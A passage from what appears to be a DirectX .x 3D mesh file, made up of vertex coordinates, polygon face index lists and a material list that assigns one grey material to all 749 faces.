-1.417268;-0.697615;-0.443774;, -1.448433;-0.678226;-0.425149;, -1.486560;-0.678569;-0.409999;, -1.521434;-0.698551;-0.402383;, -1.543709;-0.732819;-0.404342;, -1.547421;-0.772191;-0.415352;, -1.531570;-0.806117;-0.432463;, -1.500405;-0.825506;-0.451088;, -1.462279;-0.825164;-0.466239;, -1.427405;-0.805182;-0.473854;, -1.405129;-0.770914;-0.471894;, -1.401417;-0.731541;-0.460883;, -1.360153;-0.737037;-0.257411;, -1.393674;-0.716021;-0.246476;, -1.433272;-0.715348;-0.236123;, -1.468333;-0.735200;-0.229126;, -1.489470;-0.770255;-0.227361;, -1.491012;-0.811122;-0.231301;, -1.472551;-0.846851;-0.239889;, -1.439030;-0.867868;-0.250826;, -1.399432;-0.868539;-0.261179;, -1.364369;-0.848687;-0.268175;, -1.343235;-0.813632;-0.269939;, -1.341691;-0.772765;-0.265999;, -1.324858;-0.737902;-0.093081;, -1.359358;-0.716861;-0.086710;, -1.399491;-0.716176;-0.078848;, -1.434501;-0.736028;-0.071600;, -1.455008;-0.771101;-0.066910;, -1.455517;-0.811993;-0.066035;, -1.435892;-0.847750;-0.069207;, -1.401389;-0.868790;-0.075580;, -1.361260;-0.869475;-0.083443;, -1.326248;-0.849623;-0.090689;, -1.305741;-0.814551;-0.095380;, -1.305234;-0.773658;-0.096255;, -1.292165;-0.729988;0.090755;, -1.327319;-0.709106;0.093465;, -1.368150;-0.708591;0.097392;, -1.403721;-0.728578;0.101484;, -1.424500;-0.763717;0.104645;, -1.424918;-0.804586;0.106028;, -1.404866;-0.840241;0.105260;, -1.369713;-0.861123;0.102552;, -1.328882;-0.861638;0.098624;, -1.293311;-0.841650;0.094531;, -1.272534;-0.806513;0.091370;, -1.272113;-0.765642;0.089990;, -1.289198;-0.725927;0.269031;, -1.324456;-0.705192;0.265268;, -1.365425;-0.704863;0.260983;, -1.401125;-0.725029;0.257322;, -1.421990;-0.760284;0.255268;, -1.422432;-0.801184;0.255371;, -1.402329;-0.836769;0.257604;, -1.367069;-0.857504;0.261366;, -1.326099;-0.857834;0.265652;, -1.290400;-0.837668;0.269313;, -1.269536;-0.802411;0.271367;, -1.269094;-0.761513;0.271263;, -1.324673;-0.728406;0.423999;, -1.358369;-0.707562;0.413405;, -1.397356;-0.707095;0.400455;, -1.431183;-0.727129;0.388618;, -1.450790;-0.762296;0.381065;, -1.450920;-0.803175;0.379822;, -1.431543;-0.838810;0.385220;, -1.397847;-0.859654;0.395814;, -1.358862;-0.860122;0.408764;, -1.325034;-0.840087;0.420600;, -1.305428;-0.804920;0.428154;, -1.305295;-0.764040;0.429396;, -1.385485;-0.734390;0.561247;, -1.415928;-0.713226;0.543308;, -1.450996;-0.712374;0.521521;, -1.481297;-0.732061;0.501723;, -1.498710;-0.767013;0.489219;, -1.498570;-0.807865;0.487360;, -1.480913;-0.843670;0.496644;, -1.450472;-0.864834;0.514584;, -1.415403;-0.865688;0.536372;, -1.385101;-0.845999;0.556169;, -1.367687;-0.811047;0.568673;, -1.367829;-0.770196;0.570532;, -1.469948;-0.739689;0.662260;, -1.497533;-0.718345;0.640905;, -1.529131;-0.717275;0.614965;, -1.556275;-0.736763;0.591391;, -1.571692;-0.771590;0.576500;, -1.571251;-0.812424;0.574282;, -1.555069;-0.848320;0.585329;, -1.527485;-0.869664;0.606683;, -1.495886;-0.870734;0.632625;, -1.468742;-0.851246;0.656198;, -1.453324;-0.816419;0.671088;, -1.453766;-0.775586;0.673307;, -1.535000;-0.745623;0.742559;, -1.567329;-0.724712;0.727058;, -1.604003;-0.724105;0.707383;, -1.635193;-0.743963;0.688807;, -1.652546;-0.778966;0.676304;, -1.651408;-0.819736;0.673227;, -1.632087;-0.855348;0.680400;, -1.599761;-0.876258;0.695900;, -1.563087;-0.876866;0.715576;, -1.531898;-0.857007;0.734153;, -1.514545;-0.822004;0.746656;, -1.515680;-0.781234;0.749733;, -1.561944;-0.754504;0.827943;, -1.598063;-0.734842;0.824459;, -1.638898;-0.735607;0.817971;, -1.673505;-0.756591;0.810221;, -1.692613;-0.792173;0.803283;, -1.691100;-0.832819;0.799017;, -1.669375;-0.867638;0.798564;, -1.633256;-0.887298;0.802049;, -1.592422;-0.886535;0.808536;, -1.557813;-0.865550;0.816288;, -1.538705;-0.829968;0.823226;, -1.540217;-0.789321;0.827491;, -1.562435;-0.765882;0.924957;, -1.598596;-0.747191;0.929730;, -1.639479;-0.749087;0.932901;, -1.674131;-0.771065;0.933619;, -1.693264;-0.807236;0.931695;, -1.691752;-0.847907;0.927641;, -1.670004;-0.882181;0.922545;, -1.633839;-0.900872;0.917773;, -1.592958;-0.898976;0.914601;, -1.558306;-0.876998;0.913882;, -1.539175;-0.840827;0.915808;, -1.540685;-0.800156;0.919861;, -1.529986;-0.780336;1.115789;, -1.565613;-0.761882;1.123704;, -1.605748;-0.764110;1.131266;, -1.639642;-0.786427;1.136449;, -1.658207;-0.822850;1.137864;, -1.656469;-0.863621;1.135131;, -1.634899;-0.897815;1.128983;, -1.599271;-0.916269;1.121068;, -1.559136;-0.914038;1.113506;, -1.525243;-0.891722;1.108324;, -1.506677;-0.855300;1.106909;, -1.508413;-0.814529;1.109640;, -1.431110;-0.799738;1.579013;, -1.466642;-0.781303;1.587370;, -1.506593;-0.783568;1.595802;, -1.540259;-0.805928;1.602051;, -1.558614;-0.842393;1.604442;, -1.556746;-0.883190;1.602335;, -1.535152;-0.917387;1.596294;, -1.499617;-0.935823;1.587935;, -1.459668;-0.933557;1.579504;, -1.426005;-0.911198;1.573254;, -1.407646;-0.874733;1.570863;, -1.409516;-0.833936;1.572971;; 749; 4;101,113,112,100;, 4;100,112,111,99;, 4;112,124,123,111;, 4;113,125,124,112;, 4;102,114,125,113;, 4;90,102,113,101;, 4;91,103,102,90;, 4;103,115,114,102;, 4;104,116,115,103;, 4;92,104,103,91;, 4;80,92,91,79;, 4;79,91,90,78;, 4;78,90,101,89;, 4;89,101,100,88;, 4;88,100,99,87;, 4;87,99,98,86;, 4;86,98,97,85;, 4;98,110,109,97;, 4;110,122,121,109;, 4;111,123,122,110;, 4;99,111,110,98;, 4;97,109,108,96;, 4;109,121,120,108;, 4;121,133,132,120;, 4;120,132,131,119;, 4;119,131,130,118;, 4;118,130,129,117;, 4;117,129,128,116;, 4;116,128,127,115;, 4;115,127,126,114;, 4;114,126,137,125;, 4;125,137,136,124;, 4;124,136,135,123;, 4;123,135,134,122;, 4;122,134,133,121;, 4;134,146,145,133;, 4;135,147,146,134;, 4;136,148,147,135;, 4;137,149,148,136;, 4;126,138,149,137;, 4;127,139,138,126;, 4;128,140,139,127;, 4;129,141,140,128;, 4;130,142,141,129;, 4;131,143,142,130;, 4;132,144,143,131;, 4;133,145,144,132;, 4;145,157,156,144;, 4;144,156,155,143;, 4;143,155,154,142;, 4;142,154,153,141;, 4;141,153,152,140;, 4;140,152,151,139;, 4;139,151,150,138;, 4;138,150,161,149;, 4;149,161,160,148;, 4;148,160,159,147;, 4;147,159,158,146;, 4;146,158,157,145;, 4;158,170,169,157;, 4;159,171,170,158;, 4;160,172,171,159;, 4;161,173,172,160;, 4;150,162,173,161;, 4;151,163,162,150;, 4;152,164,163,151;, 4;153,165,164,152;, 4;154,166,165,153;, 4;155,167,166,154;, 4;156,168,167,155;, 4;157,169,168,156;, 4;169,181,180,168;, 4;170,182,181,169;, 4;171,183,182,170;, 4;172,184,183,171;, 4;173,185,184,172;, 4;162,174,185,173;, 4;163,175,174,162;, 4;164,176,175,163;, 4;165,177,176,164;, 4;166,178,177,165;, 4;167,179,178,166;, 4;168,180,179,167;, 4;180,192,191,179;, 4;181,193,192,180;, 4;182,194,193,181;, 4;183,195,194,182;, 4;184,196,195,183;, 4;185,197,196,184;, 4;174,186,197,185;, 4;175,187,186,174;, 4;176,188,187,175;, 4;177,189,188,176;, 4;178,190,189,177;, 4;179,191,190,178;, 4;191,203,202,190;, 4;192,204,203,191;, 4;193,205,204,192;, 4;194,206,205,193;, 4;195,207,206,194;, 4;196,208,207,195;, 4;197,209,208,196;, 4;186,198,209,197;, 4;187,199,198,186;, 4;188,200,199,187;, 4;189,201,200,188;, 4;190,202,201,189;, 4;202,214,213,201;, 4;203,215,214,202;, 4;204,216,215,203;, 4;205,217,216,204;, 4;206,218,217,205;, 4;207,219,218,206;, 4;208,220,219,207;, 4;209,221,220,208;, 4;198,210,221,209;, 4;199,211,210,198;, 4;200,212,211,199;, 4;201,213,212,200;, 4;213,225,224,212;, 4;214,226,225,213;, 4;215,227,226,214;, 4;216,228,227,215;, 4;217,229,228,216;, 4;218,230,229,217;, 4;219,231,230,218;, 4;220,232,231,219;, 4;221,233,232,220;, 4;210,222,233,221;, 4;211,223,222,210;, 4;212,224,223,211;, 4;224,236,235,223;, 4;223,235,234,222;, 4;222,234,245,233;, 4;233,245,244,232;, 4;232,244,243,231;, 4;231,243,242,230;, 4;230,242,241,229;, 4;229,241,240,228;, 4;228,240,239,227;, 4;227,239,238,226;, 4;226,238,237,225;, 4;225,237,236,224;, 4;237,249,248,236;, 4;236,248,247,235;, 4;235,247,246,234;, 4;234,246,257,245;, 4;245,257,256,244;, 4;244,256,255,243;, 4;243,255,254,242;, 4;242,254,253,241;, 4;241,253,252,240;, 4;240,252,251,239;, 4;239,251,250,238;, 4;238,250,249,237;, 4;250,262,261,249;, 4;251,263,262,250;, 4;252,264,263,251;, 4;253,265,264,252;, 4;254,266,265,253;, 4;255,267,266,254;, 4;256,268,267,255;, 4;257,269,268,256;, 4;246,258,269,257;, 4;247,259,258,246;, 4;248,260,259,247;, 4;249,261,260,248;, 4;261,273,272,260;, 4;260,272,271,259;, 4;259,271,270,258;, 4;258,270,281,269;, 4;269,281,280,268;, 4;268,280,279,267;, 4;267,279,278,266;, 4;266,278,277,265;, 4;265,277,276,264;, 4;264,276,275,263;, 4;263,275,274,262;, 4;262,274,273,261;, 4;37,49,48,36;, 4;36,48,47,35;, 4;35,47,46,34;, 4;47,59,58,46;, 4;48,60,59,47;, 4;49,61,60,48;, 4;50,62,61,49;, 4;51,63,62,50;, 4;52,64,63,51;, 4;53,65,64,52;, 4;42,54,65,53;, 4;43,55,54,42;, 4;44,56,55,43;, 4;32,44,43,31;, 4;31,43,42,30;, 4;30,42,53,41;, 4;41,53,52,40;, 4;40,52,51,39;, 4;39,51,50,38;, 4;38,50,49,37;, 4;34,46,45,33;, 4;46,58,57,45;, 4;45,57,56,44;, 4;33,45,44,32;, 4;57,69,68,56;, 4;56,68,67,55;, 4;55,67,66,54;, 4;54,66,77,65;, 4;65,77,76,64;, 4;64,76,75,63;, 4;63,75,74,62;, 4;62,74,73,61;, 4;61,73,72,60;, 4;60,72,71,59;, 4;59,71,70,58;, 4;58,70,69,57;, 4;70,82,81,69;, 4;71,83,82,70;, 4;72,84,83,71;, 4;73,85,84,72;, 4;74,86,85,73;, 4;75,87,86,74;, 4;76,88,87,75;, 4;77,89,88,76;, 4;66,78,89,77;, 4;67,79,78,66;, 4;68,80,79,67;, 4;69,81,80,68;, 4;81,93,92,80;, 4;93,105,104,92;, 4;105,117,116,104;, 4;106,118,117,105;, 4;94,106,105,93;, 4;95,107,106,94;, 4;107,119,118,106;, 4;108,120,119,107;, 4;96,108,107,95;, 4;84,96,95,83;, 4;83,95,94,82;, 4;82,94,93,81;, 4;85,97,96,84;, 4;2,8,9,3;, 4;3,9,5,4;, 5;9,8,7,6,5;, 4;4,5,6,0;, 12;30,41,40,39,38,37,36,35,34,33,32,31;, 4;12,18,19,13;, 4;13,19,15,14;, 5;19,18,17,16,15;, 4;14,15,16,10;, 12;282,293,292,291,290,289,288,287,286,285,284,283;, 4;21,27,28,22;, 5;21,22,23,24,20;, 4;22,28,29,23;, 5;28,27,26,25,29;, 4;23,29,25,24;, 12;534,545,544,543,542,541,540,539,538,537,536,535;, 12;522,523,524,525,526,527,528,529,530,531,532,533;, 12;774,775,776,777,778,779,780,781,782,783,784,785;, 12;270,271,272,273,274,275,276,277,278,279,280,281;, 4;353,365,364,352;, 4;352,364,363,351;, 4;364,376,375,363;, 4;365,377,376,364;, 4;354,366,377,365;, 4;342,354,365,353;, 4;343,355,354,342;, 4;355,367,366,354;, 4;356,368,367,355;, 4;344,356,355,343;, 4;332,344,343,331;, 4;333,345,344,332;, 4;334,346,345,333;, 4;335,347,346,334;, 4;347,359,358,346;, 4;359,371,370,358;, 4;358,370,369,357;, 4;346,358,357,345;, 4;345,357,356,344;, 4;357,369,368,356;, 4;369,381,380,368;, 4;370,382,381,369;, 4;371,383,382,370;, 4;372,384,383,371;, 4;373,385,384,372;, 4;374,386,385,373;, 4;375,387,386,374;, 4;376,388,387,375;, 4;377,389,388,376;, 4;366,378,389,377;, 4;367,379,378,366;, 4;368,380,379,367;, 4;380,392,391,379;, 4;381,393,392,380;, 4;382,394,393,381;, 4;383,395,394,382;, 4;384,396,395,383;, 4;385,397,396,384;, 4;386,398,397,385;, 4;387,399,398,386;, 4;388,400,399,387;, 4;389,401,400,388;, 4;378,390,401,389;, 4;379,391,390,378;, 4;391,403,402,390;, 4;390,402,413,401;, 4;401,413,412,400;, 4;400,412,411,399;, 4;399,411,410,398;, 4;398,410,409,397;, 4;397,409,408,396;, 4;396,408,407,395;, 4;395,407,406,394;, 4;394,406,405,393;, 4;393,405,404,392;, 4;392,404,403,391;, 4;404,416,415,403;, 4;403,415,414,402;, 4;402,414,425,413;, 4;413,425,424,412;, 4;412,424,423,411;, 4;411,423,422,410;, 4;410,422,421,409;, 4;409,421,420,408;, 4;408,420,419,407;, 4;407,419,418,406;, 4;406,418,417,405;, 4;405,417,416,404;, 4;417,429,428,416;, 4;418,430,429,417;, 4;419,431,430,418;, 4;420,432,431,419;, 4;421,433,432,420;, 4;422,434,433,421;, 4;423,435,434,422;, 4;424,436,435,423;, 4;425,437,436,424;, 4;414,426,437,425;, 4;415,427,426,414;, 4;416,428,427,415;, 4;428,440,439,427;, 4;427,439,438,426;, 4;426,438,449,437;, 4;437,449,448,436;, 4;436,448,447,435;, 4;435,447,446,434;, 4;434,446,445,433;, 4;433,445,444,432;, 4;432,444,443,431;, 4;431,443,442,430;, 4;430,442,441,429;, 4;429,441,440,428;, 4;441,453,452,440;, 4;442,454,453,441;, 4;443,455,454,442;, 4;444,456,455,443;, 4;445,457,456,444;, 4;446,458,457,445;, 4;447,459,458,446;, 4;448,460,459,447;, 4;449,461,460,448;, 4;438,450,461,449;, 4;439,451,450,438;, 4;440,452,451,439;, 4;452,464,463,451;, 4;451,463,462,450;, 4;450,462,473,461;, 4;461,473,472,460;, 4;460,472,471,459;, 4;459,471,470,458;, 4;458,470,469,457;, 4;457,469,468,456;, 4;456,468,467,455;, 4;455,467,466,454;, 4;454,466,465,453;, 4;453,465,464,452;, 4;465,477,476,464;, 4;466,478,477,465;, 4;467,479,478,466;, 4;468,480,479,467;, 4;469,481,480,468;, 4;470,482,481,469;, 4;471,483,482,470;, 4;472,484,483,471;, 4;473,485,484,472;, 4;462,474,485,473;, 4;463,475,474,462;, 4;464,476,475,463;, 4;476,488,487,475;, 4;477,489,488,476;, 4;478,490,489,477;, 4;479,491,490,478;, 4;480,492,491,479;, 4;481,493,492,480;, 4;482,494,493,481;, 4;483,495,494,482;, 4;484,496,495,483;, 4;485,497,496,484;, 4;474,486,497,485;, 4;475,487,486,474;, 4;487,499,498,486;, 4;486,498,509,497;, 4;497,509,508,496;, 4;496,508,507,495;, 4;495,507,506,494;, 4;494,506,505,493;, 4;493,505,504,492;, 4;492,504,503,491;, 4;491,503,502,490;, 4;490,502,501,489;, 4;489,501,500,488;, 4;488,500,499,487;, 4;500,512,511,499;, 4;499,511,510,498;, 4;498,510,521,509;, 4;509,521,520,508;, 4;508,520,519,507;, 4;507,519,518,506;, 4;506,518,517,505;, 4;505,517,516,504;, 4;504,516,515,503;, 4;503,515,514,502;, 4;502,514,513,501;, 4;501,513,512,500;, 4;513,525,524,512;, 4;512,524,523,511;, 4;511,523,522,510;, 4;510,522,533,521;, 4;521,533,532,520;, 4;520,532,531,519;, 4;519,531,530,518;, 4;518,530,529,517;, 4;517,529,528,516;, 4;516,528,527,515;, 4;515,527,526,514;, 4;514,526,525,513;, 4;288,300,299,287;, 4;289,301,300,288;, 4;290,302,301,289;, 4;291,303,302,290;, 4;292,304,303,291;, 4;293,305,304,292;, 4;282,294,305,293;, 4;283,295,294,282;, 4;284,296,295,283;, 4;285,297,296,284;, 4;286,298,297,285;, 4;287,299,298,286;, 4;299,311,310,298;, 4;300,312,311,299;, 4;301,313,312,300;, 4;302,314,313,301;, 4;303,315,314,302;, 4;304,316,315,303;, 4;305,317,316,304;, 4;294,306,317,305;, 4;295,307,306,294;, 4;296,308,307,295;, 4;297,309,308,296;, 4;298,310,309,297;, 4;310,322,321,309;, 4;311,323,322,310;, 4;312,324,323,311;, 4;313,325,324,312;, 4;314,326,325,313;, 4;315,327,326,314;, 4;316,328,327,315;, 4;317,329,328,316;, 4;306,318,329,317;, 4;307,319,318,306;, 4;308,320,319,307;, 4;309,321,320,308;, 4;321,333,332,320;, 4;322,334,333,321;, 4;323,335,334,322;, 4;324,336,335,323;, 4;325,337,336,324;, 4;326,338,337,325;, 4;327,339,338,326;, 4;328,340,339,327;, 4;329,341,340,328;, 4;318,330,341,329;, 4;319,331,330,318;, 4;320,332,331,319;, 4;331,343,342,330;, 4;330,342,353,341;, 4;341,353,352,340;, 4;340,352,351,339;, 4;339,351,350,338;, 4;338,350,349,337;, 4;337,349,348,336;, 4;349,361,360,348;, 4;361,373,372,360;, 4;362,374,373,361;, 4;350,362,361,349;, 4;351,363,362,350;, 4;363,375,374,362;, 4;360,372,371,359;, 4;348,360,359,347;, 4;336,348,347,335;, 4;1,7,8,2;, 4;0,6,7,1;, 4;1,2,3,4;, 3;1,4,0;, 4;604,616,615,603;, 4;603,615,614,602;, 4;615,627,626,614;, 4;616,628,627,615;, 4;617,629,628,616;, 4;605,617,616,604;, 4;593,605,604,592;, 4;592,604,603,591;, 4;591,603,602,590;, 4;590,602,601,589;, 4;602,614,613,601;, 4;614,626,625,613;, 4;613,625,624,612;, 4;601,613,612,600;, 4;589,601,600,588;, 4;588,600,599,587;, 4;600,612,611,599;, 4;612,624,623,611;, 4;611,623,622,610;, 4;599,611,610,598;, 4;587,599,598,586;, 4;586,598,597,585;, 4;585,597,596,584;, 4;597,609,608,596;, 4;609,621,620,608;, 4;610,622,621,609;, 4;598,610,609,597;, 4;584,596,595,583;, 4;596,608,607,595;, 4;608,620,619,607;, 4;607,619,618,606;, 4;595,607,606,594;, 4;583,595,594,582;, 4;582,594,605,593;, 4;594,606,617,605;, 4;606,618,629,617;, 4;618,630,641,629;, 4;629,641,640,628;, 4;628,640,639,627;, 4;627,639,638,626;, 4;626,638,637,625;, 4;625,637,636,624;, 4;624,636,635,623;, 4;623,635,634,622;, 4;622,634,633,621;, 4;621,633,632,620;, 4;620,632,631,619;, 4;619,631,630,618;, 4;631,643,642,630;, 4;630,642,653,641;, 4;641,653,652,640;, 4;640,652,651,639;, 4;639,651,650,638;, 4;638,650,649,637;, 4;637,649,648,636;, 4;636,648,647,635;, 4;635,647,646,634;, 4;634,646,645,633;, 4;633,645,644,632;, 4;632,644,643,631;, 4;644,656,655,643;, 4;645,657,656,644;, 4;646,658,657,645;, 4;647,659,658,646;, 4;648,660,659,647;, 4;649,661,660,648;, 4;650,662,661,649;, 4;651,663,662,650;, 4;652,664,663,651;, 4;653,665,664,652;, 4;642,654,665,653;, 4;643,655,654,642;, 4;655,667,666,654;, 4;654,666,677,665;, 4;665,677,676,664;, 4;664,676,675,663;, 4;663,675,674,662;, 4;662,674,673,661;, 4;661,673,672,660;, 4;660,672,671,659;, 4;659,671,670,658;, 4;658,670,669,657;, 4;657,669,668,656;, 4;656,668,667,655;, 4;668,680,679,667;, 4;667,679,678,666;, 4;666,678,689,677;, 4;677,689,688,676;, 4;676,688,687,675;, 4;675,687,686,674;, 4;674,686,685,673;, 4;673,685,684,672;, 4;672,684,683,671;, 4;671,683,682,670;, 4;670,682,681,669;, 4;669,681,680,668;, 4;681,693,692,680;, 4;682,694,693,681;, 4;683,695,694,682;, 4;684,696,695,683;, 4;685,697,696,684;, 4;686,698,697,685;, 4;687,699,698,686;, 4;688,700,699,687;, 4;689,701,700,688;, 4;678,690,701,689;, 4;679,691,690,678;, 4;680,692,691,679;, 4;692,704,703,691;, 4;693,705,704,692;, 4;694,706,705,693;, 4;695,707,706,694;, 4;696,708,707,695;, 4;697,709,708,696;, 4;698,710,709,697;, 4;699,711,710,698;, 4;700,712,711,699;, 4;701,713,712,700;, 4;690,702,713,701;, 4;691,703,702,690;, 4;703,715,714,702;, 4;702,714,725,713;, 4;713,725,724,712;, 4;712,724,723,711;, 4;711,723,722,710;, 4;710,722,721,709;, 4;709,721,720,708;, 4;708,720,719,707;, 4;707,719,718,706;, 4;706,718,717,705;, 4;705,717,716,704;, 4;704,716,715,703;, 4;716,728,727,715;, 4;717,729,728,716;, 4;718,730,729,717;, 4;719,731,730,718;, 4;720,732,731,719;, 4;721,733,732,720;, 4;722,734,733,721;, 4;723,735,734,722;, 4;724,736,735,723;, 4;725,737,736,724;, 4;714,726,737,725;, 4;715,727,726,714;, 4;727,739,738,726;, 4;726,738,749,737;, 4;737,749,748,736;, 4;736,748,747,735;, 4;735,747,746,734;, 4;734,746,745,733;, 4;733,745,744,732;, 4;732,744,743,731;, 4;731,743,742,730;, 4;730,742,741,729;, 4;729,741,740,728;, 4;728,740,739,727;, 4;740,752,751,739;, 4;739,751,750,738;, 4;738,750,761,749;, 4;749,761,760,748;, 4;748,760,759,747;, 4;747,759,758,746;, 4;746,758,757,745;, 4;745,757,756,744;, 4;744,756,755,743;, 4;743,755,754,742;, 4;742,754,753,741;, 4;741,753,752,740;, 4;753,765,764,752;, 4;754,766,765,753;, 4;755,767,766,754;, 4;756,768,767,755;, 4;757,769,768,756;, 4;758,770,769,757;, 4;759,771,770,758;, 4;760,772,771,759;, 4;761,773,772,760;, 4;750,762,773,761;, 4;751,763,762,750;, 4;752,764,763,751;, 4;764,776,775,763;, 4;765,777,776,764;, 4;766,778,777,765;, 4;767,779,778,766;, 4;768,780,779,767;, 4;769,781,780,768;, 4;770,782,781,769;, 4;771,783,782,770;, 4;772,784,783,771;, 4;773,785,784,772;, 4;762,774,785,773;, 4;763,775,774,762;, 4;540,552,551,539;, 4;541,553,552,540;, 4;542,554,553,541;, 4;543,555,554,542;, 4;544,556,555,543;, 4;545,557,556,544;, 4;534,546,557,545;, 4;535,547,546,534;, 4;536,548,547,535;, 4;537,549,548,536;, 4;538,550,549,537;, 4;539,551,550,538;, 4;551,563,562,550;, 4;552,564,563,551;, 4;553,565,564,552;, 4;554,566,565,553;, 4;555,567,566,554;, 4;556,568,567,555;, 4;557,569,568,556;, 4;546,558,569,557;, 4;547,559,558,546;, 4;548,560,559,547;, 4;549,561,560,548;, 4;550,562,561,549;, 4;562,574,573,561;, 4;563,575,574,562;, 4;564,576,575,563;, 4;565,577,576,564;, 4;566,578,577,565;, 4;567,579,578,566;, 4;568,580,579,567;, 4;569,581,580,568;, 4;558,570,581,569;, 4;559,571,570,558;, 4;560,572,571,559;, 4;561,573,572,560;, 4;573,585,584,572;, 4;574,586,585,573;, 4;575,587,586,574;, 4;576,588,587,575;, 4;577,589,588,576;, 4;578,590,589,577;, 4;579,591,590,578;, 4;580,592,591,579;, 4;581,593,592,580;, 4;570,582,593,581;, 4;571,583,582,570;, 4;572,584,583,571;, 4;11,17,18,12;, 4;10,16,17,11;, 4;11,12,13,14;, 3;11,14,10;, 4;20,26,27,21;, 4;24,25,26,20;; MeshMaterialList { 1; 749; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.329412;0.329412;0.329412;1.0;; 60.0; 0.000000;0.000000;0.000000;; 